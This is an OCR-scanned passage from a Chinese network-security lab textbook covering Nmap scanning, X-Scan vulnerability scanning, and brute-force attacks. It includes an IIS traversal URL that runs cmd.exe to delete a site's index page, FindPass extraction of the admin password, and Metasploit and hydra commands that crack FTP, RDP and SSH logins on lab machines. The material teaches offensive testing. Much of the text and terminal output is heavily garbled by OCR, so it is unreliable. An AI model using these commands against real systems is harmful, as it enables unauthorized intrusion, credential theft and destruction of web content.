命令 语法 : nmap 目标 主机 IP 地 址 

例如 ,nmap 192. 168. 1.2 ,结果 如 图 9-121 所 示 o 

(10) Nmap 简单 扫描 ,并 对 返回 的 结果 详细 描述 输出 。 

命令 语法 : nmap -vv 目标 主机 IP 地 址 。 

介绍 : -vv 参数 设置 对 结果 的 详细 输出 。 

例如 ,nmap-vv 192. 168. 1. 2 ,结果 如 图 9-122 所 示 。 

(11) Nmap 自 定义 扫描 。 

Nmap 默认 扫描 目标 1 一 10 000 范围 内 的 端口 号 。 可 以 通过 参数 -p 来 设置 将 要 扫描 的 
端口 号 。 

命令 语法 : nmap -p( 端 口 范围 ) 二 目标 主机 IP 地 址 二 

解释 : 端口 大 小 不 能 超过 65 535。 

例如 ,扫描 目标 主机 100 一 200 号 端口 ,结果 如 图 9-123 所 示 。 


Users\YangFY>nmap 192. 168. 1. 2 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-27 16:17 9D1ú+êx? 


: warning: Unable to determine any DNS servers. Reverse DNS is 
disabled, Try using --system-dns or specify valid servers with --dns- 


imap scan report for 192.168.1.2 
ost is up (0.00s latency). 
t shown: 995 closed ports 
STATE SERVICE 
msrpc 
netbios-ssn 
microsoft-ds 
LSA-or-nterm 
ms-wbt-server 
: 00:0C:29:3F:45:81 (VMware) 


Imap done: 1 IP address (1 host up) scanned in 16.83 seconds 


图 9-121 简单 扫描 


;AUsers\WangFY>nmap -vv 192. 168. 1. 2 


Starting Nmap 7.01 ( https://nmap. org ) at 2016-01-27 16:30 ?D1ú 

r7? 

Initiating ARP Ping Scan at 16:30 

Scanning 192. 168. 1.2 [1 port] 

ompleted ARP Ping Scan at 16:30, 2.20s elapsed (1 total hosts) 

[mass dns: warning: Unable to determine any DNS servers. Reverse DNS is 
disabled. Try using --system-dns or specify valid servers with --dns-se 


Initiating SYN Stealth Scan at 16:30 
Scanning 192. 168. 1.2 [1000 ports] 
Discovered open port 445/tcp on 192.168.1.2 
scovered open port 135/tcp on 192.168.1.2 
scovered open port 139/tcp on 192.168.1.2 
Discovered open port 3389/tcp on 192.168.1.2 
Discovered open port 1026/tcp on 192.168.1.2 
ompleted SYN Stealth Scan at 16:30, 1.22s elapsed (1000 total ports) 
Nmap scan report for 192.168.1.2 
Host is up, received arp-response (0.00s latency). 
Scanned at 2016-01-27 16:30:02 ?D1üX6 X ?6 t ?? for 15s 
Not shown: 995 closed ports 
Reason: 995 resets 
REASON 
syn-ack ttl 
netbios-ssn  syn-ack ttl 
microsoft-ds syn-ack ttl 
LSA-or-nterm syn-ack ttl 
ms-wbt-server syn-ack ttl 
MAC Address: 00:0C:29:3F:45:81 (Viware) 


Read data files from: C:\Program Files (x86) Wmap 
map done: 1 IP address (1 host up) scanned in 16.69 seconds 
Raw packets sent: 1082 (47.592KB) | Revd: 1001 (40. 048KB) 


图 9-122 简单 扫描 ,并 对 返回 的 结果 详细 描述 输出 
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C:\Users\FangFY>nmap -p100-200 192. 168. 1. 2 


Starting Nmap 7.01 ( https://nmap. org ) at 2016-01-27 16:36 ?D1átéx 38 
EE] 

[nass dns: warning: Unable to determine any DNS servers. Reverse DNS is 
disabled. Try using --system-dns or specify valid servers with --dns-se 
acr 

Nmap scan report for 192.168.1.2 

Host is up (0.00s latency). 

Not shown: 99 closed ports 

IPORT STATE SERVICE 

135/tcp open msrpc 

l38/tcp open netbios-ssn 

MAC Address: 00:0C:29:38:45:81 (Vilware) 


Nmap done: 1 IP address (1 host up) scanned in 15.41 seconds 


C: \Users\WangF Y> 


图 9-123 扫描 目标 主机 100 一 200 号 端口 


(12) Nmap 指定 端口 扫描 。 
有 时 不 想 对 所 有 端口 进行 探测 ,只 想 对 几 个 特殊 的 端口 进行 扫描 ,还 可 以 利用 参数 p 进 


置 。 
命令 语法 : nmap -p(portl ,port2 vapp ) 一 目标 主机 IP 地 址 
例如 ,nmap -p135,139,445 192. 168. 1.2, 如 图 9-124 所 示 
E 命令 提示 符 = o x 


:\Users\WangFY>nmap -p135, 139, 445 192. 168. 1. 2 


Starting Nmap 7.01 ( https://nmap. org ) at 2016-01-27 16:41 79D1ú +êx 98 
t 


ap scan report for 192.168.1.2 
up (0.00s latency). 
STATE SERVICE 
open msrpc 
open netbios-ssn 
open microsoft-ds 
MAC Address: 00:0C:29:3F:45:81 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 15.39 seconds 


:\UsersWangF Y> 


9-124 ”特殊 端口 扫描 


(13) Nmap ping 扫描 。 
Nmap 可 以 利用 类 似 Windows/Linux 系统 下 的 ping 方式 进行 扫描 。 
命令 语法 : nmap -sP 二 目标 主机 IP 地 址 

解释 : SP 设置 扫描 方式 为 ping 扫描 

例如 ,nmap -sP 192. 168. 1.2, 如 图 9-125 所 示 。 

(14) Nmap 扫描 一 个 网 段 下 的 IP, 
命令 语法 : nmap-sP 网 段 地 址 范 


n 
A 
ec 


国 命令 提示 符 = n x 
:\Users\FangFY>nmap -sP 192.168.1.2 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-27 16:44 7Dlüté X 76 


[nass dns: warning: Unable to determine any DNS servers. Reverse DNS is 
BEN Try using --system-dns or specify valid servers with --dns-se 


: 00:07:29:38:45:81 (Vilware) 
: i IP address (1 host up) scanned in 15.35 seconds 


:NUsersWangFW. 


图 9-125 Nmap ping 扫描 


例如 ,nmap -sP 192. 168. 1. 1-255 ,如 图 9-126 所 示 。 
| esso - n x 
:AMUsers\WangFV>nmap -sP 192. 168. 1. 1-255 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-27 16:53 90 志士 SX 76 
+27 

mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is 
[li sabled. Try using --system-dns or specify valid servers with --dns-se 


Nmap scan report for 192.168.1.1 
Host is up (0.00s latency). 


]IAC Address: 00:0C:29:CE:A5:5F (Viware) 

Nmap scan report for 192.168.1.2 

Host is up (0.00s latency) 

MAC Address: 00:0C:29:3F [EC CDI 

Nmap scan report for 192. 168. 1.100 

Host is up. 

[Nmap done: 255 IP addresses (3 hosts up) scanned in 18. 19 seconds 


9-126 ”扫描 网 段 


(15) Nmap 操作 系统 类 型 的 探测 

Nmap 通过 目标 开放 的 端口 来 探测 主机 所 运行 的 操作 系统 类 型 。 这 是 信息 收集 中 很 重 
要 的 一 步 , 它 可 以 帮助 用 户 找到 特定 操作 系统 上 含有 漏洞 的 服务 

命令 语法 : nmap -O - 主机 IP 地 址 

例如 ,nmap -O 192. 168. 1. 2, 如 图 9-127 所 示 

(16) Nmap 万 能 开关 。 

此 选项 设置 包含 1 一 10 000 的 端口 ping 扫描 ,操作 系统 扫描 ,脚本 扫描 ,路 由 跟踪 ,服务 
探测 。 

命令 语法 : nmap -A < iin IP 地 址 

例如 ,nmap -A 192. 168. 1. 2 ,结果 如 图 9-128 所 示 。 

总 结 : 该 工具 可 以 将 所 有 端口 的 开放 情况 做 一 个 测试 ,通过 端口 扫描 ,可 以 知道 对 方 开 
放 了 哪些 网 络 服务 ,从 而 根据 某 些 服务 的 漏洞 进行 攻击 。 
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n rer 
s up (0. 


ults at h 


图 9-128 万 能 开关 
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实验 19 漏洞 扫描 X-Scan 


一 、 实 验 目的 


学 会 利用 工具 软件 X-Scan 来 扫描 服务 器 的 漏洞 。 
扫描 内 容 包 括 : 

CD 远程 操作 系统 类 型 及 版 本 ; 

(2) 标准 端口 状态 及 端口 Banner 信息 ; 

(3) SNMP 信息 ,CGI 漏洞 ,IIS 漏洞 ,RPC 漏洞 ,SSL 漏洞 ; 
(4) SQL-Server, FTP-Server, SMTP-Server, POP3-Server; 
(5) NT-Server 58 E14 JH P* NT 服务 器 NetBIOS 信息 ; 
(6) 注册 表 信 息 等 。 


二 、 实 验 所 需 软件 


客户 机 操作 系统 : Windows 2000/Windows XP,IP 地 址 为 192. 168. 1. 2, 

服务 器 操作 系统 : Windows 2000 Advance Server/Windows XP,IP 地 址 为 192. 168. 1. 5。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : X-Scan。 


三 、 实 验 步 骤 
执行 X-Scan, 主 界面 如 图 9-129 所 示 ,选择 菜单 栏 设置 下 的 菜单 项 “扫描 模 块 ”扫描 模 
块 的 设置 如 图 9-130 所 示 。 
à} X-Scan v2.3 GUI ni xi 


3t) SEW FEO IAV Language HMD 
Jeo|[»u m=|@jó|o 


-Scan-v2.3 使 用 说 明 


一 .系统 要 求 : Windows 9x/NT4/2000 


二. 功能 简介 : 


采用 多 线程 方式 对 指定 IF 地 址 段 或 单机 ) 进 行 安全 漏洞 检测 ,支持 插件 功能 ,提供 了 图 形 
| 界面 和 命令 行 两 种 操作 方式 ,扫描 内 容 包括 : 远程 操作 系统 类 型 及 版 本 ,标准 端 口 状态 及 端口 wj 


| I 4 


9-129 软件 主 界面 


确定 要 扫描 主机 的 IP 地 址 或 者 IP 地 址 段 , 选 择 菜 单 栏 设置 下 的 菜单 项 “扫描 参数 ”, 扫 
描 一 台 主 机 ,在 指定 IP 范围 框 中 输入 “192. 168. 1. 5”, 如 图 9-131 所 示 。 设 置 完 毕 后 ,进行 漏 
洞 扫描 , 单 击 工具 栏 上 的 绿色 “开始 "图标, 开始 对 目标 主机 进行 扫描 ,扫描 结果 如 图 9-132 
所 示 。 
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His 


[192.168.1.5 
L| 


图 9-131 指定 IP 范围 


192.168.1.5 MWindovs NT 


scripts] check bat/. telle. NelXle .KelXl erinnt/systen32/ cnd. exe?1cy20diry20C-\ 
scripts. 35363. . /.. XkSSYES. ./. XXGSY83.. /virat/ systen32/ cnd. exe?/ctdir 
/seripts/, XIGSI83. . /..SX3SYE3. ./.. QISSXEOw innt ysten32/ end. ex?/ chi 
/seripts/. .X3563.. /vinnt/systan32/cnd. exa? / chi 

dscripts/. 'SkSSc. ./. .Wse /.. SS3Sc.. [vinnt/systen32/ cod. exe?/ctdir 

[scripts Wse. ./. BSc... MScinnt/systen32/ cod. exe?/ctdir 

Lseripts/. Sc. /winnt/systen32/ cmd. ext / chr 

/seripts/. .X25%35%63. . /. .25x35%63. ./. KUSKISYES.. Jvinnt/systen32/cnà. exe?/ctdir 
/scripts/. .N535%3. ./. . 25X35%63. . /.. GSTOSEOinnt/ systen32/cnd. exe?/ctdir 
/seripts/.  XOSISSYES. . /winnt/systen32/ end exe?/ctdir 

[scripts/. XS2E W252E US2E. 25D fvinnt/ systen32/ cnà. exe?/ctdir 

[scripts/. osse . J.. 455e 7. 1255c. . vinnt/ systen32/cnd. exe?/ctdir 

/seripts/. Nes5e../- .Xes5e /No55evinnt/systen32/cnd ez?/ctdir 

/seripts/. KESSc..Jvinnt/systen32/ end. exe?/ctdir 

/scripts/check bat/. SSWE3 _/. SXSSX6Swinnt/systen32/ cmd. exe?/ eNO0dir¥20C:\ 


€— 
Hd E 


9-132 ”漏洞 扫描 出 来 的 结果 
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下 面 利用 扫描 出 来 的 结果 删除 网 页 ,在 没有 删除 前 ,打开 的 网 页 如 图 9-133 所 示 。 


图 9-133 可 以 打开 的 网 页 


然后 利用 扫描 出 来 的 漏洞 删除 网 页 ,如 图 9-134 所 示 ,删除 后 就 不 能 打开 这 个 网 页 了 ， 
如 图 9-135 所 示 o 


TARD MMO EEO IMO TAD PMI 


|Ha- +- OAA AR um gme Dr 3 


[WD) [E] nzo:ir192.169.1 Siscrets[. 6387863. jwinntsystemazfamd exe? j+ delc: Unetpublyeerootindex him. 


I z] o*m jus» 
UE RAMS 
CGI Error 


The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did 
return are: 


ale 


E 9-134 利用 扫描 出 来 的 漏洞 删除 网 页 
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您 提供 的 证 书 没有 权限 查看 该 目录 或 同 页。 


请 次 试 下 列 操作 | 


。 单 击 剧 新 按钮 ， 并 使 用 其 他 证 书 重 试 
。 如果 i 目录 或 网 页 ,请 与 Web MESEDE 
系 ， 其 电子 邮件 地 址 或 电话 号 码 请 参阅 1:0 166 1.5 主页 。 


HITP 401.2 - 未 授权 ; 服务 器 配置 问题 导致 登录 失败 
Internet 信息 服务 


技术 信息 5 支持 个 人 ) 


。 ÑR: 
通 利 ， 这 是 由 于 服务 器 庙 和 本 未 能 正确 发 送 mr 身份 验证 头 文件 字 
el 


9-135 ”网 页 打 不 开 


实验 20 ”端口 扫描 器 SuperScan 


一 、 实 验 目 的 


SuperScan 是 一 款 功能 强大 的 端口 扫描 工具 。 其 功能 如 下 。 

(1) 通过 ping 命令 来 检验 IP 是 否 在 线 ; 

(2) IP 和 域名 相互 转换 ; 

(3) 检验 目标 计算 机 提供 的 服务 类 别 ; 

(4) 检验 一 定 范围 目标 计算 机 的 是 否 在 线 和 端口 情况 ; 

(5) 工具 自 定义 列表 检验 目标 计算 机 是 否 在 线 和 端口 情况 ,等 等 。 


二 、 实 验 所 需 软件 


客户 机 操作 系统 : Windows 2000/Windows XP.IP 地 址 为 172. 19. 25. 1 。 

服务 器 操作 系统 : Windows 2000 Advance Server/Windows XP.IP 地 址 为 172. 19. 
25. 10。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : 共享 扫描 器 Shed. exe. 


三 、 实 验 步骤 


不 需要 安装 ,直接 执行 图 9-136 中 的 SuperScanV4. 0-RHC. exe 文件 ,在 “主机 名 ”文本 
框 中 输入 要 扫描 的 主机 名 ,软件 自动 转换 成 IP 地 址 ,软件 界面 如 图 9-137 所 示 。 单 击 右 下 
角 的 按钮 ,开始 扫描 。 
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i: 
© 
E 
W 
E 


L SuperScan 4.0 
XftQ) REO FEV KEWA IAO 帮助 加 


Qa- O- B ss wr 国 - 
HE QD [£3 E: nalimei\ 网 络 安全 技术 与 实验 教程 \ha-SuperSean\SuperSean 4.0 
[2] 


xemx JE | 


C9 健一 人 新 文 伯 赤 | 
Q 将 这 个 文件 发 到 LXIEHBEHA 

Teb can 4 SUPSEAUETE 
Internet 快捷 方式 


软件 说 明 z 使 用 说 明 . txt 
Internet 快捷 方式 xd 
1 X5 Z 5 


E 9-136 ”安装 的 软件 


“m 


a SuperScan 4. 0 


扫描 | 主机 和 服务 扫描 设置 | 扫描 选项 | 工具 ”| Yindows EO | 关于 
IP 地 址 
主机 名 /IP [PRC-20131004NW. = 
3Pt rr X|[ 182 . 166 2 
smr X| |- 


从 文件 读 取 TP 地 址 ->| 


Live hosts this batch: 1 


Total live hosts discovered 
Total open TCP ports 
Total open UDP ports 


Performing banner grabs... 
TCP banner grabbing (0 ports) 
UDP banner grabbing (0 ports) 

Reporting scan results... 

Scan done 


Discovery scan finished: 04/20/14 09:38:05 


»|m[mn| maw | 


 Bavedlog file —— [1/1 dene 


9-137 ”扫描 的 结果 


实验 21 得 到 管理 员 密 码 FindPass 


一 、 实 验 目 的 


使 用 工具 软件 FindPass 得 到 登录 管理 员 的 登录 用 户 名 和 密码 。 
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、 实 验 所 需 软件 


系统 要 求 : Windows XP、Windows 2000 Server(Windows 2000 Server Advanced) 
工具 软件 : FindPass. exe 


、 实 验 步 又 


系统 管理 员 登 录 系 统 以 后 ,离开 计算 机 时 没有 锁定 计算 机 ,或 者 直接 以 自己 的 账号 登 
录 , 然 后 让 别人 使 用 可 以 使 用 FindPass 工具 对 该 进程 进行 解码 。 
首先 将 FindPass. exe 复制 到 C 盘 根 目录 下 ,执行 该 程序 ,将 得 到 当前 用 户 的 登录 名 和 
密码 ,如 图 9-138 所 示 。 


ll 


5 C:\WINNT\system32\cmd.exe 
Windows 2080 [U on 5.08.2195] 


To Find Password in the Winlogon process 
Usage: FindPass.exe DomainName UserNane PID-of-WinLogon 


debug privilege has been added to vordReminder. 
MinLogon process id is 208 <ØxBABAABdA). 

find VIN2800-SRU-UMAdninistrator password in process 208 ... 
encoded passuo found at BxBB8BeB8BB and has a length of 3. 
logon informat VIN2888-SRU -UM/Rdninistrator/cbn. 

hash byte Bxce- 


A 9-138 解密 出 来 用 户 名 和 密码 


总 结 : 只 要 可 以 侵入 某 个 系统 ,获取 管理 员 或 超级 用 户 的 密码 是 可 能 的 


实验 22 FTP 服务 暴力 破解 


一 、 实 验 目的 
(1) 掌握 Metasploit 基本 操作 原理 ; 
(2) 掌握 ftp_login 模块 操作 方法 。 
二 、 实 验 所 需 软 件 


客户 机 操作 系统 : Kali-Linux 1.1,IP 地 址 为 193. 168. 1. 100 
服务 器 操作 系统 : Windows 2003 Advance Server,IP 地 址 为 193. 168. 1. 23。 
实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 


£o X 


x 


3 
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Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 


所 需 软 件 : Metasploit\NMAP 字典 文件 。 


(1) 打开 Kali-Linux 虚拟 机 ,利用 Kali-Linux 自 带 的 Nmap 扫描 : nmap-v-A-Pn 193. 


168.1 


Nmap scan report for 193. 168. 1. 23 
Host is up (0. 0010s latency) 

994 closed ports 
STATE SERVICE 
open ftp 
open msrpc 
open netbios-ssn 
open microsoft- ds 
open msrpc Microsoft Windows 
open msrpc Microsoft Windows 
MAC Address: 00: 0C: 29:91: BD: CE ( VMware) 
Device type: general purpose 
Running: Microsoft Windows 2003 

cpe: / o: microsoft: windows server. 2003 


VERSION 
Microsoft ftpd 
Microsoft Windows 


Microsoft Windows 


445/ tcp 
1026/ tcp 
1027/ tcp 


s: Microsoft Windows Server 2003 SP1 
Network Distance: 1 hop 
TCP Sequence Prediction: Difficultys261 (Good 
IP ID Sequence Generation: Incremental 
Service Info: OS: Windows; 


.23 ,结果 如 图 9-139 所 示 ,发 现 开 放 FTP 服务 ,在 21 端口 上 。 


RPC 
2003 or 2008 microsoft- ds 


RPC 
RPC 


sp1 cpe:/o: microsoft: windows serve 
or SP2 


luck!) 


CPE: cpe:/o: microsoft: windows 


图 9-139 Nmap 扫描 结果 


参数 说 明 ， 
vi 启用 详细 模式 ， 
A: 探测 目标 操作 系统 ; 


Pn: 不 去 ping 目标 主机 ,减少 被 发 现 或 被 防护 设备 屏蔽 的 概 
-个 新 的 命令 行 窗口 ,连接 FTP 服务 器 测试 任 
试 这 个 过 
双 ,用 户 不 会 被 锁定 ,如 图 9-140 所 示 , 因 此 可 以 进行 暴力 破解 ， 


(2) 打开 另 
密码 错误 多 次 的 情况 下 用 户 被 锁定 
输入 


多 次 尝 


|220 Microsoft FTP Service 


Name (193. 168. 1. 23: root) 
331 Password required for 
password 


意 


账户 密码 ,检测 是 否 会 在 
试 


x 


z 


:次 或 以 上 ) ,发现 依旧 可 以 


aaa 
EET 


[530 User aaa cannot log in. 


root&Dptech 
Connected to 193. 168. 1. 23 


R20 Microsoft FTP Service 


Name (193. 168. 1. 23: root) 


attack: ~# ftp 193. 168. 1 


bbb 


31 Password required for bbb. 


Password: 


|530 User bbb cannot log in. 


Login failed. 


t@ptech 
[Connected to 193. 168. 1. 23 
R20 Microsoft FTP Service 
[Name (193. 168. 1. 23: root) 
B31 Password required for ccc 
Password 
30 User ccc cannot log in 


attack: ~# ftp 193. 168. 1. 


ccc 


图 9-140 ”尝试 登录 
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(3) 打开 Kali-Linux 系统 命令 行 窗口 ,输入 “msfconsole”, 启 动 Metasploit 工具 ,如 
图 9-141 所 示 。 


[Trouble managing data? List, sort, group, tag and search 
your pentest data 

in Metasploit Pro -- learn more on http: //rapid7. cory met 
asploit 


9-141 JAZ) Metasploit 


(4) 输入 “search ftp_login”, 搜 索 ftp login 模块 ,如 图 9-142 所 示 。 


msf > search ftp_ login 
[!] Database not connected or cache not built, using slo 
w search 


Matching Modules 


Name Disclosure Date Ran 
Description 


auxiliary/ scanner/ ftp/ ftp_login 
mal FTP Authentication Scanner 


9-142 18 € ftp login 模块 


(5) 输入 “use auxiliary/scanner/ftp/ftp login" .JillZ ftp login 模块 ,如 图 9-143 所 示 o 


p/ ftp_login 


E 9-143 加载 ftp login 模块 


(6) 输入 “show options”, 查 看 ftp login 模块 的 参数 ,如 图 9-144 Bros o 


[era 
BRUTEFORCE. SPEED to bru e, 
DB ALL CREDS l y user/ password c 


rated by space, one pair per line 
users 


图 9-144 ftp login 模块 参数 


重要 参数 解释 如 下 。 
RHOSTS: 目标 主机 IP 地 址 。 
PASS_FILE: 暴力 破解 密码 字 


典 存放 路 径 。 


^ Ax 


B93 


w 
e 
e: 


USERNAME: 指定 暴力 破解 使 用 的 用 户 名 。 
STOP ON SUCCE 设置 破解 出 密码 后 立即 停止 暴力 破解 。 
C) 设置 暴力 破解 目标 主机 FTP 的 相关 参数 ,如 图 9-145 所 示 。 


msf auxiliary( ftp_login) > set rhosts 193. 168. 1. 23 
193. 168. 1. 23 
in) > set pass file /tmp/ pass. txt 


A 9-145 设置 各 项 参数 
(8) 输入 “exploit” 开 始 攻 击 ,成 功 获取 密码 ,为 “admin888”, 如 图 9-146 所 示 。 


auxıliary( ftp_login) > exploit 


193. 168. 1. 23:21 - Starting FTP login sweep 

No active DB -- Credential data will not be saved! 

193. 168. 1. 23:21 FTP - LOGIN FAILED: admin: 56 (Incorrect: ) 
No active DB -- Credential data will not be saved! 

No active DB -- Credential data will not be saved! 

193. 168. 1. 23:21 - LOGIN SUCCESSFUL: admin: admi n888 

Scanned 1 of 1 hosts (100% complete) 

Auxiliary module execution completed 

auxiLiary( ft 


图 9-146 软件 界面 


(9) 尝试 登录 FTP, 打 开 Kali 系统 
的 用 户 名 和 密码 ,如 图 9-147 所 示 。 
(10) 输入 “dir”, 可 显示 当前 路 径 下 的 文件 夹 ,如 图 9-148 所 示 。 


《 端 ,输入 “ftp 193. 168. 1. 23”, 随 后 输入 上 面 获取 


rootGDptech- attack: ~# ftp 193. 168. 1. 23 
Connected to 193. 168. 1. 23 

220 Microsoft FTP Service 

Name (193.168. 1. 23: root): admin 


331 Password required for admin. 150 Opening ASCII mode data connection for /bin/1s 


Password: 09: 49AM 4 1. txt 
230 User admin logged in -15 10: 12AM «DIR 2 
Remote system type is Windows NT 226 Transfer complete. 


ftp» B 


图 9-147 成功 登录 FTP 服务 器 9-148 ”执行 dir 命令 
总 结 : 本 实验 介绍 了 FTP 暴力 破解 漏洞 的 基本 原理 及 ftp login 模块 的 基本 使 用 方法 ， 
车 有 足够 权限 ,可 在 服务 器 上 写 恶 意 代码 的 文件 


实验 23 ”远程 桌面 暴力 破解 


一 、 实 验 目的 


了 解 3389 端口 暴力 破解 原理 ,掌握 hydra 工具 的 使 用 方法 ,掌握 远程 桌面 暴力 破解 的 
过 程 及 方法 。 


二 、 实 验 所 需 软件 


客户 机 操作 系统 : Kali-Linux 1. 1.IP 地 址 为 193. 168. 1. 100。 
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服务 器 操作 系统 : Windows 2003 Advance Server 地 址 为 193. 


具 软 件 : hydra, Nmap 及 密码 表 。 
三 、 实 验 步 骤 
(D 加 载 Kali-Linux 虚拟 机 ,打开 Kali %4 


ig 


168. 1. 


,利用 Nmap 对 目标 193. 168. 1. 25 进 


行 端口 扫描 。 命 令 如 下 :; nmap -v -A -Pn 193. 168. 1. 25, 发 现 开放 远程 桌面 服务 ,在 3389 


端口 ,可 以 尝试 进行 暴力 破解 。 结 果 如 图 9-149 所 示 。 


STATE SERVICE VERSION 
open msrpc Microsoft Windows RPC 
open netbios-ssn 


open microsoft-ds Microsoft Windows 2003 or 2008 microsoft- ds 


1025/tcp open msrpc Microsoft Windows RPC 
3389/ tcp open ms- wbt- server Microsoft Terminal Service 
MAC Address: 00: 0C: 29: 79: C3: 34 (VMware) 

Device type: general purpose 

Running: Microsoft Windows 2003 


os CPE: cpe:/o: microsoft: windows_server_2003: : sp1 cpe:/o: microsoft: windows serve| 


r_2003: : sp2 
OS details: Microsoft Windows Server 2003 SP1 or Si 


图 9-149 Nmap 扫描 结果 
参数 说 明 如 下 。 
v: 启用 模式 。 
A: 探测 目标 操作 系统 。 


Pn: 不 去 ping 目标 主机 ,减少 被 发 现 或 被 防护 设备 屏蔽 的 概率 


(2) 打开 Kali 系统 终端 ,输入 如 下 命令 : hydra 193. 168. 1. 25 


) rdp -l admin -P /tmp/ 


pass. txt -t 1 -V。 成 功 获 取 登 录 远 程 桌面 的 密码 ,为 admin888, 如 图 9-150 所 示 。 


root@ptec ack: ~=# hydra 193. 168. 1.25 rdp -L admn -P /tmp/ pass. txt -t 1 -V 
Hydra v8.1 (c) 2014 by van Hauser/THC - Plea: o not use in military or secret 


service organizations, or for illegal purpos 


Hydra (http://www. thc. org/ thc- hydra) starting at 2016-01-28 11:15:31 
[DATA] max 1 task per 1 server, overall 64 tasks, 102 login tries (1L:1/p:102)，-| 


1 try per task 
[ DATA] attacking service rdp on port 3389 

J [ rdp] host: login password: admin 
of 1 target Successfully completed, 1 valid password found 


Hydra (http://www. thc. org/ thc- hydra) finished at 2016-01-28 11:15:35 


root&Dptech- attack: ~# 


9-150 hydra 破解 成 功 


参数 说 明 如 下 。 


rdp: 为 可 选 的 对 应 服务 的 参数 之 一 ,其 余 可 选 值 还 有 telnet, ftp 等 。 


En y sino Addit 
-P. 指定 破解 使 用 的 字典 。 


-t: 指定 暴力 破解 线程 ,由 于 系统 安全 限制 ,需要 将 线程 设置 为 1。 


-V: 显示 详细 过 程 。 


(3) 在 本 机 打开 远程 桌面 连接 界面 ,输入 对 方 IP 地 址 193. 168. 1. 25 并 连接 ,如 图 9-151 


所 示 。 
(4) 输入 第 (2) 步 获取 的 用 户 名 和 密码 , 单 
图 9-152 所 示 。 


确定 ”按钮 登录 ,成 功 登 上 目标 系统 ,如 


g 3.1.25] | 
xis | apwo | 选项 @) » 
图 9-151 连接 远程 漏洞 服务 器 


3193. 168.1. 25 - WESH 


ENC: \FINDOTS\systea32\cad. exe 


oft Windows [版 本 5.2.3790] 
有 1985-2003 Microsoft Corp. 


C:\Documents and Settings'*adnmin?ipconfig 


Windows IP Configuration 


Ethernet adapter 本 


Connect io! 
IP fiddr: 


图 9-152 成 功 登录 服务 器 


总 结 : 通过 本 实验 掌握 了 hydra 基本 操作 方法 ,暴力 破解 获取 远程 桌面 登录 账号 和 密 
码 后 攻击 者 可 登录 远程 桌面 ,直接 获取 远程 服务 器 的 操作 权限 ,造成 极为 严重 的 后 果 。 


实验 24 SSH 服务 暴力 破解 


一 、 实 验 目 的 

掌握 通过 Metasploit 中 ssh. login 模块 对 SSH 服务 进行 暴力 破解 最 终 获 取 密 码 的 
过 程 。 
二 、 实 验 所 需 软 件 


客户 机 操作 系统 : Kali-Linux 1. 1,IP 地 址 为 193. 168. 1. 100。 
服务 器 操作 系统 : CentOS 6.5, 地 址 为 193. 168. 1. 26。 
工具 软件 : Metasploit、Nmap。 


三 、 实 验 步骤 


CD 加 载 Kali-Linux 虚拟 机 ,打开 Kali 系统 终端 ,利用 Nmap 对 目标 193. 168. 1. 26 进 
行 端口 扫描 。 命令 如 下 : nmap -v -A -Pn 193. 168. 1. 26 ,发 现 开 放 22 端口 ,可 以 尝试 进行 
暴力 破解 。 结 果 如 图 9-153 所 示 。 
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Initiating NSE at 12:13 
Completed NSE at 12:13, 0.40s elapsed 
Nmap scan report for 193.168.1.26 
Host is up {0.00057s latency) 
Not shown: 998 closed ports 
STATE SERVICE VERSION 
open ssh OpenSSH 5.3 (protocol 2. 0) 
| ssh- hostkey: 
1024 a9: 40: fb: 20: 18: 57: 8d: ad: 77: 2d: 99: :3e: 1c: 52 (DSA) 
2048 af: 48: c1: a7: 48: 8a: 42: Be: 2b: 44: 5 
M tcp open rpcbind 2-4 (RPC #100000) 
rpcinfo 
program version  port/proto service 
100000 2,3, 111/tcp rpcbind 
100000 1 111/udp rpcbind 
100024 56752/udp status 
100024 60835/tcp_status 


A 9-153 Nmap 扫描 结果 


参数 说 明 如 下 。 

vi 启用 详细 模式 。 

A: 探测 目标 操作 系统 。 

Pn: 不 去 ping 目标 主机 ,减少 被 发 现 或 被 防护 设备 屏蔽 的 概 3 

(2) 打开 另 一 个 新 的 命令 行 窗口 ,输入 “ssh admin@193. 168. 1. 26” ,任意 输入 密码 
示 访 问 被 阻止 。 多 次 尝试 这 个 过 程 (三 次 或 以 上 ) ,发现 依旧 可 以 尝试 输入 密码 ,用 户 不 会 被 
锁定 ,如 图 9-154 所 示 , 因 此 满足 暴力 破解 漏洞 存在 的 所 有 条 件 , 可 以 进行 暴力 破解 。 


dE 


root@ptech- attack: -# ssh adm n@i93. 168. 1. 26 

adminél93. 168. 1. 26' s password. 

Permission denied, please try again. 

admin@193. 168. 1. 26' s password. 

Permission denied, please try again. 

adminG@I93. 168. 1. 26' s password: 

Permission denied (publickey, gssapi- keyex, gssapi- with- mic, password) 


9-154 ”尝试 登录 


i 破解 ,打开 Kali 系统 终端 ,输入 


(3) 使 用 Metasploit 中 的 ssh. login 模块 进行 破 


“msfconsole”, 如 图 9-15: 


3Kom SuperHack II Logon 


User Name: 


Password: 


9-155 ”启动 Metasploit 


(4) 输入 “search ssh_login”, 搜 索 ssh login 模块 ,如 图 9-156 所 示 。 
(5) 输入 “use auxiliary/scanner/ssh/ssh_login”, 加载 ssh login 模块 ,如 图 9-157 
所 示 。 


> search ssh login 
Database not connected or cache not built, using slow search 


Matching Modules 


msf 
! 


Name Disclosure Date Rank Description 
auxi liary/ scanner/ ssh/ ssh_login normal SSH Login Ch 
eck Scanner 
auxiliary/ scanner/ ssh/ ssh_ login_pubkey normal SSH Public K 
ey Login Scanner 


A 9-156 ”搜索 ssh login 模块 


图 9-157 mii ssh login 模块 


